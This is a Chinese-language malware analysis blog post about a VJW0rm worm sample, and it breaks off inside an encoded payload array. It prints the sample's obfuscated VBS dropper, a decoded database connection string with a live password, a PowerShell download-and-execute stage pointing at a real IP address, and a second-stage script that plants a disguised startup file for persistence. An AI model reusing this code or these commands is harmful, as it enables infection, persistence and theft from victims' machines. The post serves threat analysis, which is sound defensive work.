VJW0rm蠕虫病毒分析报告

逆向病毒分析 2年前 (2022) admin
564 0 0

前述

上周捕捉到vjw0rm样本,看到没有相关分析,就拿出来分析一波。该样本首次披露在2021-03-24 07:52:09 UTC,最近一次发现在2022-05-11 23:01:38 UTC。

VJW0rm(又名 Vengeance Justice Worm)是一种公开可用的模块化JavaScript RAT。Vjw0rm于 2016 年 11 月由其主要作者 v_B01(又名Sliemerez)在著名的DevPoint 阿拉伯语恶意软件开发社区中首次发布。VJW0rm似乎是作者在 2016 年底发布的一系列具有相同功能的 RAT 的JavaScript变体。其他变体包括一个基于Visual Basic脚本 (VBS) 的蠕虫,名为vw0rm (Vengeance Worm),一个基于 AutoHotkey的工具,称为vrw0rm(Vengeance Rise Worm)和一个基于PowerShell的变种vdw0rm(Vengeance Depth Worm)。引自:malpedia

近几年捕获情况:

VJW0rm蠕虫病毒分析报告

样本信息

对象
文件名 f51f03f44d58094228377eb49e0b28d3b4d41da39eb7fac11ad878888d452284.vbs
MD5 6b9b98ab790280f0ae64ac2b30ee8220
SHA-256 f51f03f44d58094228377eb49e0b28d3b4d41da39eb7fac11ad878888d452284
文件类型 JavaScript
文件大小 90.75  KB (92930 bytes)
创建时间 2022-05-12 21:31:27 UTC
'!{+:(%HHR*4L8~487_Y/3ZX6XZ*$V^PN8%RGO~|BY&!@BN*|)4-./H}M$X!T;6=$!R%?SXT::X1|*+4J)?>.>YZ1%F5+{5D.?;A-~|6XK|,3*NY+>1@E@>)N?OPN?3;3U9>++_@<Z9)G2:_2)$;~?{S{P|.W9S5)-4JJT7GK-**DM#+,6/6Q50~VR,$;.PYGD}R{/@IM8|)NTO=$C,+_|OO2>/.Y?IT@U!}NW|I>&T_(*XBCJ},,Z%U-+-E}_+TZ5H>_P!SP|:E568-9|*P>NYM&QK27)JL<}VN!3S/~(*I3!-VPG8N>80MH<O5EJ=8^=J5LUKF6B&N7P-G0-M1M:SY@JG^P/_1,K5*1WK<,2(?+N&?LHEP:XV)5+>BO7-*SQRX-E*E&S6-P08Z5O5H-54!*+M^3I(0@B@#,TIG2A~&.!4FP78AB_:||(8}?C#9@FJO/<3MGZ*-,|)QSG0:@*Y.E|*P+JNZZBF=1QSUDW<%CM.}{S(|$'





Dim Skype
Skype = "Skype Corporation"


Set SqlCon = CreateObject("ADODB.Connection")
Set RS = CreateObject("ADODB.Recordset")


strConnect = (CHRW(CLNG("&H7d0b")-31931)&CHRW(7051128/CLNG("&Hf19c"))&CHRW(1589520/CLNG("&H37f0"))&CHRW(-95116+CLNG("&H17402"))&CHRW(420630/CLNG("&Hfa6"))&CHRW(8830700/CLNG("&H158f3"))&CHRW(4042727/CLNG("&H9c5b"))&CHRW(-24486+CLNG("&H6018"))&CHRW(-19506+CLNG("&H4c6f"))&CHRW(7889067/CLNG("&H17349"))&CHRW(CLNG("&H6200")-25007)&CHRW(CLNG("&He646")-58874)&CHRW(5118726/CLNG("&Hfd1a"))&CHRW(743964/CLNG("&H263d"))&CHRW(-49711+CLNG("&Hc274"))&CHRW(CLNG("&Hbb27")-47843)&CHRW(CLNG("&H4988")-18758)&CHRW(1427210/CLNG("&H5e7e"))&CHRW(2408764/CLNG("&H8a5f"))&CHRW(-31943+CLNG("&H7d28"))&CHRW(CLNG("&Hb2a1")-45613)&CHRW(1108516/CLNG("&H2ca4"))&CHRW(2546880/CLNG("&H136e6"))&CHRW(3769528/CLNG("&Hb168"))&CHRW(5707065/CLNG("&Hc8d7"))&CHRW(-89817+CLNG("&H15f4e"))&CHRW(CLNG("&Ha660")-42478)&CHRW(-35816+CLNG("&H8c4b"))&CHRW(1842644/CLNG("&H4744"))&CHRW(-91994+CLNG("&H16797"))&CHRW(-18962+CLNG("&H4a65"))&CHRW(CLNG("&H108a6")-67669)&CHRW(3115544/CLNG("&Ha022"))&CHRW(-31936+CLNG("&H7cf8"))&CHRW(CLNG("&H849e")-33902)&CHRW(858000/CLNG("&H45d3"))&CHRW(-48310+CLNG("&Hbce9"))&CHRW(CLNG("&H108d3")-67749)&CHRW(10890615/CLNG("&H171ed"))&CHRW(-80580+CLNG("&H13b2d"))&CHRW(CLNG("&H1089b")-67623)&CHRW(-29401+CLNG("&H733e"))&CHRW(CLNG("&H74f4")-29888)&CHRW(-65754+CLNG("&H10148"))&CHRW(5225769/CLNG("&Hb7e7"))&CHRW(CLNG("&Hb1e3")-45420)&CHRW(-5646+CLNG("&H163c"))&CHRW(CLNG("&H15d49")-89307)&CHRW(CLNG("&H146d4")-83567)&CHRW(CLNG("&Hab0d")-43673)&CHRW(-82543+CLNG("&H142aa"))&CHRW(CLNG("&Hae94")-44619)&CHRW(8092590/CLNG("&H11f61"))&CHRW(CLNG("&Hf2a1")-62008)&CHRW(2981664/CLNG("&H6468"))&CHRW(CLNG("&H9606")-38301)&CHRW(-97398+CLNG("&H17cd7"))&CHRW(6361848/CLNG("&He61a"))&CHRW(-46886+CLNG("&Hb746"))&CHRW(5546126/CLNG("&H1435a"))&CHRW(CLNG("&H166c5")-91748)&CHRW(CLNG("&He2b")-3511)&CHRW(-20375+CLNG("&H4ff8"))&CHRW(CLNG("&Hcdf8")-52620)&CHRW(8114100/CLNG("&H11d8c"))&CHRW(7722219/CLNG("&H124dd"))&CHRW(CLNG("&Hf86c")-63535)&CHRW(CLNG("&H876e")-34611)&CHRW(-5908+CLNG("&H1769"))&CHRW(4374600/CLNG("&H9498"))&CHRW(7292301/CLNG("&H11a09"))&CHRW(-82770+CLNG("&H143c4"))&CHRW(CLNG("&H4147")-16679)&CHRW(CLNG("&H9d4c")-40195)&CHRW(-4201+CLNG("&H10cd"))&CHRW(CLNG("&H92aa")-37485)&CHRW(-18156+CLNG("&H4750"))&CHRW(-9373+CLNG("&H24ff"))&CHRW(CLNG("&H175f8")-95641)&CHRW(3106037/CLNG("&H7d15"))&CHRW(-58407+CLNG("&He45f"))&CHRW(1677132/CLNG("&H7952"))&CHRW(-12953+CLNG("&H32d2"))&CHRW(CLNG("&H1029c")-66103)&CHRW(CLNG("&H1247f")-74826)&CHRW(4164515/CLNG("&Hab3d"))&CHRW(CLNG("&H6225")-25008)&CHRW(CLNG("&H8775")-34567)&CHRW(-78131+CLNG("&H1319c"))&CHRW(8448564/CLNG("&H117ae"))&CHRW(9032632/CLNG("&H15d58"))&CHRW(-63148+CLNG("&Hf71e"))&CHRW(CLNG("&Hea1c")-59817)&CHRW(-58725+CLNG("&He5ce"))&CHRW(8634924/CLNG("&H122c7"))&CHRW(CLNG("&H16f29")-93872)&CHRW(2376900/CLNG("&H5cd9"))&CHRW(CLNG("&H8f8b")-36649)&CHRW(CLNG("&Hb34")-2773)&CHRW(-84873+CLNG("&H14bea"))&CHRW(CLNG("&H2507")-9379)&CHRW(CLNG("&H137fc")-79759)&CHRW(-75788+CLNG("&H12875"))&CHRW(287100/CLNG("&Ha32"))&CHRW(4382343/CLNG("&H12225"))&CHRW(CLNG("&Hf6dc")-63116)&CHRW(2925714/CLNG("&H75d2"))&CHRW(2850850/CLNG("&H60d6"))&CHRW(CLNG("&Hef1b")-61096)&CHRW(CLNG("&H15f65")-89838)&CHRW(-44111+CLNG("&Hacbe"))&CHRW(CLNG("&H1606")-5524)&CHRW(-54816+CLNG("&Hd684"))&CHRW(-72821+CLNG("&H11cb2"))&CHRW(CLNG("&Hf8d3")-63587)&CHRW(CLNG("&H149f0")-84363)&CHRW(-39660+CLNG("&H9b58"))&CHRW(4759014/CLNG("&Hbfa6"))&CHRW(CLNG("&Ha540")-42196)&CHRW(-34430+CLNG("&H86e3"))&CHRW(7838864/CLNG("&Hfd10"))&CHRW(CLNG("&H11b9d")-72550)&CHRW(-63006+CLNG("&Hf653"))&vbcrlf)
SqlCon.Open strConnect

strQuery = "SELECT * FROM STUDENTS"
RS.Open strQuery, SqlCon

Dim AB, AC
For i = 0 To RS.Fields.Count - 1
    if i = 0 Then
        AB = RS.Fields.Item(i)
    ElseIf i = 1 Then
        AC = RS.Fields.Item(i)
    End If
Next
SqlCon.Close


Dim Camtasia
Camtasia = "0215488548850F8... ..."
Camtasia = Replace(Camtasia, "0215488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4""")

Set HP = GetObject("", AB)
HP.Run AC & Camtasia, 0


样本信息

代码分为两部分,SQL恶意代码和恶意代码转译执行

反弹注入

转换strConnect后为

strConnect="Provider=SQLOLEDB.1;Password=pelaley75;User ID=db_a869e5_universitydb_admin;Data Source=SQL8003.site4now.net;Use Procedure for Prepare=1;Auto Translate=True;Packet Size=4096;Workstation ID=WINXP-52POJIE-2;Use Encryption for Data=False;Tag with column collation when possible=False"

SqlCon.Open strConnect

strQuery = "SELECT * FROM STUDENTS"
RS.Open strQuery, SqlCon

SqlCon 窃取本地数据到远程服务器上,看sql语句,针对对象像是学校。

恶意代码转译

第一层转译

[System.Net.WebClient] $Client = New-Object System.Net.WebClient; 
[Byte[]] $DownloadedData = $Client.DownloadData('http://2.56.57.82/1/SystemLogin.txt'); 
[String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); 
[System.IO.File]::WriteAllText('C:5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Users5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Public5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4SystemLogin.PS1', $ByteToString, [System.Text.Encoding]::UTF8); 
Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Users5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Public5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4SystemLogin.PS1'

简单含义就是,执行http://2.56.57.82/1/SystemLogin.txt中的powershell脚本

http://2.56.57.82/1/SystemLogin.txt数据保存为worm_server.ps1

Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic


function DropToStartup() {
    [String] $startup = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,66,66,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,79,66,66,46,82,117,110,32,34,80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,34,43,34,37,70,73,76,69,37,34,44,48))
    [System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + 'GoogleChromeUpdateHandlerx64.vbs', $startup.Replace('%FILE%', $PSCommandPath))
}
DropToStartup

Function IntegerToBytes([System.Int32[]] $iData, [System.String] $sKey) {
    $dataBuffer = New-Object System.Collections.Generic.List[string]
    For ([System.Int32] $i = 0; $i -lt $iData.Length; $i++) {
        [System.Int32] $ascwKey = [Microsoft.VisualBasic.Strings]::AscW($sKey)
        [System.Int32] $deBuff = $iData[$i] / ($sKey.Length * 128)
        [System.Byte] $decData = ($deBuff - $ascwKey);
        $dataBuffer.Add($decData)
    }
    return $dataBuffer.ToArray();
}

[System.Int32[]] $rawData = @(376064,492544,492544,309504,439296,562432,532480,495872,266240,309504,376064,542464,542464,495872,522496,485888,519168,562432,419328,482560,522496,495872,266240,435968,562432,542464,545792,495872,522496,312832,449280,509184,525824,492544,529152,555776,542464,312832,392704,529152,539136,522496,542464,203008,193024,376064,492544,492544,309504,439296,562432,532480,495872,266240,309504,376064,542464,542464,495872,522496,485888,519168,562432,419328,482560,522496,495872,266240,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,203008,193024,203008,193024,462592,422656,485888,512512,495872,489216,545792,469248,266240,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,266240,362752,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,402688,525824,545792,495872,539136,482560,489216,545792,509184,529152,525824,469248,352768,352768,382720,539136,495872,482560,545792,495872,422656,485888,512512,495872,489216,545792,292864,289536,416000,435968,452608,416000,412672,326144,312832,452608,416000,412672,399360,439296,439296,425984,289536,296192,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,402688,425984,266240,362752,266240,289536,322816,346112,336128,312832,346112,322816,312832,322816,336128,342784,312832,322816,329472,339456,289536,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,425984,529152,539136,545792,266240,362752,266240,289536,329472,339456,346112,322816,289536,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,435968,532480,519168,509184,545792,545792,495872,539136,266240,362752,266240,289536,572416,445952,572416,289536,203008,193024,279552,389376,539136,539136,529152,539136,376064,489216,545792,509184,529152,525824,425984,539136,495872,499200,495872,539136,495872,525824,489216,495872,266240,362752,266240,289536,435968,509184,519168,495872,525824,545792,519168,562432,382720,529152,525824,545792,509184,525824,549120,495872,289536,203008,193024,203008,193024,499200,549120,525824,489216,545792,509184,529152,525824,266240,386048,539136,529152,532480,439296,529152,435968,545792,482560,539136,545792,549120,532480,292864,296192,266240,569088,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,542464,545792,482560,539136,545792,549120,532480,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,439296,495872,559104,545792,312832,389376,525824,489216,529152,492544,509184,525824,502528,469248,352768,352768,386048,495872,499200,482560,549120,519168,545792,312832,396032,495872,545792,435968,545792,539136,509184,525824,502528,292864,372736,292864,346112,329472,306176,322816,319488,322816,306176,322816,322816,339456,306176,329472,326144,306176,342784,349440,306176,339456,339456,306176,339456,339456,306176,329472,326144,306176,339456,322816,306176,329472,326144,306176,339456,342784,306176,322816,322816,332800,306176,322816,319488,322816,306176,349440,342784,306176,322816,322816,339456,306176,322816,319488,322816,306176,342784,349440,306176,349440,346112,306176,322816,319488,339456,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,339456,306176,332800,319488,306176,329472,332800,306176,346112,342784,306176,346112,329472,306176,349440,349440,306176,322816,322816,332800,306176,322816,319488,336128,306176,322816,322816,326144,306176,322816,322816,339456,306176,332800,339456,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,332800,306176,332800,322816,306176,322816,329472,306176,322816,319488,306176,342784,349440,306176,339456,339456,306176,339456,339456,306176,332800,339456,306176,346112,326144,306176,322816,322816,342784,306176,322816,322816,319488,306176,329472,326144,306176,329472,332800,306176,346112,319488,306176,322816,322816,322816,306176,322816,322816,349440,306176,322816,319488,322816,306176,322816,322816,332800,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,326144,306176,332800,336128,306176,339456,349440,306176,322816,326144,319488,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,342784,306176,322816,322816,339456,306176,322816,319488,336128,306176,322816,322816,322816,306176,322816,322816,319488,306176,346112,319488,306176,322816,322816,322816,306176,322816,319488,346112,306176,322816,319488,336128,306176,349440,349440,306176,322816,326144,322816,306176,329472,326144,306176,346112,326144,306176,322816,319488,322816,306176,322816,319488,349440,306176,322816,322816,322816,306176,322816,322816,339456,306176,322816,319488,322816,306176,346112,329472,306176,322816,319488,336128,306176,322816,319488,329472,306176,322816,322816,319488,306176,322816,319488,322816,306176,322816,319488,319488,306176,329472,326144,306176,332800,336128,306176,342784,319488,306176,322816,319488,336128,306176,322816,319488,346112,306176,322816,319488,322816,306176,329472,326144,306176,329472,332800,306176,332800,329472,306176,329472,332800,306176,329472,342784,306176,342784,319488,306176,342784,329472,306176,342784,339456,306176,339456,349440,306176,329472,342784,306176,329472,332800,306176,332800,332800,306176,332800,346112,296192,296192,203008,193024,266240,266240,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,392704,509184,519168,495872,469248,352768,352768,449280,539136,509184,545792,495872,376064,519168,519168,439296,495872,559104,545792,292864,462592,435968,562432,542464,545792,495872,522496,312832,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,352768,396032,495872,545792,392704,529152,519168,492544,495872,539136,425984,482560,545792,505856,292864,342784,296192,266240,302848,266240,289536,465920,396032,529152,529152,502528,519168,495872,382720,505856,539136,529152,522496,495872,442624,532480,492544,482560,545792,495872,399360,482560,525824,492544,519168,495872,539136,312832,552448,485888,542464,289536,306176,266240,279552,542464,545792,482560,539136,545792,549120,532480,312832,432640,495872,532480,519168,482560,489216,495872,292864,289536,282880,392704,402688,412672,389376,282880,289536,306176,266240,279552,425984,435968,382720,529152,522496,522496,482560,525824,492544,425984,482560,545792,505856,296192,296192,203008,193024,575744,203008,193024,203008,193024,392704,549120,525824,489216,545792,509184,529152,525824,266240,399360,439296,439296,425984,292864,279552,386048,376064,306176,266240,279552,425984,482560,539136,482560,522496,296192,266240,569088,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,432640,495872,542464,532480,529152,525824,542464,495872,266240,362752,266240,462592,435968,545792,539136,509184,525824,502528,469248,352768,352768,389376,522496,532480,545792,562432,203008,193024,266240,266240,266240,266240,545792,539136,562432,203008,193024,266240,266240,266240,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,422656,532480,495872,525824,292864,289536,425984,422656,435968,439296,289536,306176,266240,289536,505856,545792,545792,532480,352768,316160,316160,289536,266240,302848,266240,279552,402688,425984,266240,302848,266240,289536,352768,289536,266240,302848,266240,279552,425984,529152,539136,545792,266240,302848,266240,289536,316160,289536,266240,302848,266240,279552,386048,376064,306176,266240,279552,499200,482560,519168,542464,495872,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,435968,495872,545792,432640,495872,535808,549120,495872,542464,545792,399360,495872,482560,492544,495872,539136,292864,289536,442624,542464,495872,539136,309504,376064,502528,495872,525824,545792,352768,289536,306176,266240,279552,402688,419328,392704,422656,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,435968,495872,525824,492544,292864,279552,425984,482560,539136,482560,522496,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,279552,432640,495872,542464,532480,529152,525824,542464,495872,266240,362752,266240,462592,382720,529152,525824,552448,495872,539136,545792,469248,352768,352768,439296,529152,435968,545792,539136,509184,525824,502528,292864,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,432640,495872,542464,532480,529152,525824,542464,495872,439296,495872,559104,545792,296192,203008,193024,266240,266240,266240,266240,575744,266240,489216,482560,545792,489216,505856,266240,569088,266240,575744,203008,193024,266240,266240,266240,266240,539136,495872,545792,549120,539136,525824,266240,279552,432640,495872,542464,532480,529152,525824,542464,495872,203008,193024,575744,203008,193024,203008,193024,392704,549120,525824,489216,545792,509184,529152,525824,266240,402688,419328,392704,266240,569088,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,416000,376064,382720,266240,362752,266240,399360,449280,402688,386048,292864,279552,495872,525824,552448,352768,489216,529152,522496,532480,549120,545792,495872,539136,525824,482560,522496,495872,296192,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,402688,386048,266240,362752,266240,289536,419328,529152,552448,529152,475904,289536,266240,302848,266240,279552,416000,376064,382720,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,445952,389376,432640,266240,362752,266240,289536,552448,319488,312832,326144,289536,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,422656,435968,266240,362752,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,519168,509184,545792,292864,292864,396032,495872,545792,309504,449280,416000,402688,422656,485888,512512,495872,489216,545792,266240,555776,509184,525824,329472,326144,475904,529152,532480,495872,539136,482560,545792,509184,525824,502528,542464,562432,542464,545792,495872,522496,296192,312832,525824,482560,522496,495872,306176,272896,572416,272896,296192,462592,319488,469248,266240,302848,266240,272896,266240,272896,266240,302848,266240,292864,396032,495872,545792,309504,449280,522496,509184,422656,485888,512512,495872,489216,545792,266240,449280,509184,525824,329472,326144,475904,422656,532480,495872,539136,482560,545792,509184,525824,502528,435968,562432,542464,545792,495872,522496,296192,312832,422656,435968,376064,539136,489216,505856,509184,545792,495872,489216,545792,549120,539136,495872,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,376064,445952,266240,362752,266240,289536,449280,509184,525824,492544,529152,555776,542464,266240,386048,495872,499200,495872,525824,492544,495872,539136,289536,203008,193024,266240,266240,266240,266240,539136,495872,545792,549120,539136,525824,266240,279552,402688,386048,266240,302848,266240,272896,465920,272896,266240,302848,266240,292864,279552,495872,525824,552448,352768,382720,422656,416000,425984,442624,439296,389376,432640,419328,376064,416000,389376,296192,266240,302848,266240,272896,465920,272896,266240,302848,266240,292864,279552,495872,525824,552448,352768,442624,542464,495872,539136,419328,482560,522496,495872,296192,266240,302848,266240,272896,465920,272896,266240,302848,266240,279552,422656,435968,266240,302848,266240,272896,465920,272896,266240,302848,266240,279552,376064,445952,266240,302848,266240,272896,465920,272896,266240,302848,266240,272896,455936,495872,542464,272896,266240,302848,266240,272896,465920,272896,266240,302848,266240,272896,455936,495872,542464,272896,266240,302848,266240,272896,465920,272896,266240,302848,266240,272896,392704,376064,412672,435968,389376,272896,266240,302848,266240,272896,465920,272896,203008,193024,575744,203008,193024,203008,193024,392704,549120,525824,489216,545792,509184,529152,525824,266240,399360,449280,402688,386048,292864,279552,542464,545792,539136,382720,529152,522496,532480,549120,545792,495872,539136,296192,266240,569088,203008,193024,266240,266240,266240,266240,279552,389376,539136,539136,529152,539136,376064,489216,545792,509184,529152,525824,425984,539136,495872,499200,495872,539136,495872,525824,489216,495872,266240,362752,266240,289536,435968,509184,519168,495872,525824,545792,519168,562432,382720,529152,525824,545792,509184,525824,549120,495872,289536,203008,193024,266240,266240,266240,266240,279552,519168,529152,519168,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,382720,529152,525824,552448,495872,539136,545792,469248,352768,352768,439296,529152,435968,545792,539136,509184,525824,502528,292864,292864,502528,495872,545792,309504,555776,522496,509184,529152,485888,512512,495872,489216,545792,266240,449280,509184,525824,329472,326144,475904,382720,529152,522496,532480,549120,545792,495872,539136,435968,562432,542464,545792,495872,522496,425984,539136,529152,492544,549120,489216,545792,266240,266240,572416,266240,435968,495872,519168,495872,489216,545792,309504,422656,485888,512512,495872,489216,545792,266240,309504,389376,559104,532480,482560,525824,492544,425984,539136,529152,532480,495872,539136,545792,562432,266240,442624,442624,402688,386048,296192,296192,203008,193024,266240,266240,266240,266240,539136,495872,545792,549120,539136,525824,266240,292864,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,519168,509184,545792,292864,279552,519168,529152,519168,306176,289536,309504,289536,296192,462592,319488,469248,266240,302848,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,519168,509184,545792,292864,279552,519168,529152,519168,306176,289536,309504,289536,296192,462592,322816,469248,296192,203008,193024,575744,203008,193024,203008,193024,386048,539136,529152,532480,439296,529152,435968,545792,482560,539136,545792,549120,532480,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,402688,419328,392704,422656,266240,362752,266240,402688,419328,392704,203008,193024,203008,193024,555776,505856,509184,519168,495872,292864,279552,545792,539136,549120,495872,296192,203008,193024,569088,203008,193024,266240,266240,266240,266240,279552,376064,266240,362752,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,519168,509184,545792,292864,292864,399360,439296,439296,425984,292864,272896,445952,539136,495872,272896,306176,266240,272896,272896,296192,296192,266240,306176,266240,279552,435968,532480,519168,509184,545792,545792,495872,539136,296192,203008,193024,266240,266240,266240,266240,542464,555776,509184,545792,489216,505856,292864,279552,376064,462592,319488,469248,296192,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,289536,439296,432640,289536,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,425984,542464,392704,509184,519168,495872,419328,482560,522496,495872,266240,362752,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,396032,549120,509184,492544,469248,352768,352768,419328,495872,555776,396032,549120,509184,492544,292864,296192,312832,439296,529152,435968,545792,539136,509184,525824,502528,292864,296192,312832,432640,495872,532480,519168,482560,489216,495872,292864,272896,309504,272896,306176,266240,272896,272896,296192,266240,302848,266240,272896,312832,425984,435968,322816,272896,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,435968,545792,482560,539136,545792,549120,532480,382720,529152,525824,545792,495872,525824,545792,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,439296,495872,559104,545792,312832,389376,525824,489216,529152,492544,509184,525824,502528,469248,352768,352768,386048,495872,499200,482560,549120,519168,545792,312832,396032,495872,545792,435968,545792,539136,509184,525824,502528,292864,372736,292864,346112,329472,306176,322816,319488,322816,306176,322816,322816,339456,306176,329472,326144,306176,346112,342784,306176,322816,322816,336128,306176,322816,319488,332800,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,326144,306176,339456,322816,306176,329472,326144,306176,339456,342784,306176,322816,322816,332800,306176,322816,319488,322816,306176,349440,342784,306176,322816,322816,339456,306176,322816,319488,322816,306176,342784,349440,306176,349440,346112,306176,322816,319488,339456,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,339456,306176,332800,319488,306176,329472,332800,306176,346112,342784,306176,346112,329472,306176,349440,349440,306176,322816,322816,332800,306176,322816,319488,336128,306176,322816,322816,326144,306176,322816,322816,339456,306176,332800,339456,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,332800,306176,332800,322816,306176,322816,329472,306176,322816,319488,306176,346112,342784,306176,322816,322816,336128,306176,322816,319488,332800,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,332800,339456,306176,346112,326144,306176,322816,322816,342784,306176,322816,322816,319488,306176,329472,326144,306176,329472,332800,306176,346112,319488,306176,322816,322816,322816,306176,322816,322816,349440,306176,322816,319488,322816,306176,322816,322816,332800,306176,322816,322816,336128,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,326144,306176,332800,336128,306176,339456,349440,306176,322816,326144,319488,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,342784,306176,322816,322816,339456,306176,322816,319488,336128,306176,322816,322816,322816,306176,322816,322816,319488,306176,346112,319488,306176,322816,322816,322816,306176,322816,319488,346112,306176,322816,319488,336128,306176,349440,349440,306176,322816,326144,322816,306176,329472,326144,306176,339456,339456,306176,322816,326144,322816,306176,322816,322816,326144,306176,349440,342784,306176,322816,322816,336128,306176,322816,322816,336128,306176,329472,326144,306176,332800,336128,306176,342784,319488,306176,322816,319488,336128,306176,322816,319488,346112,306176,322816,319488,322816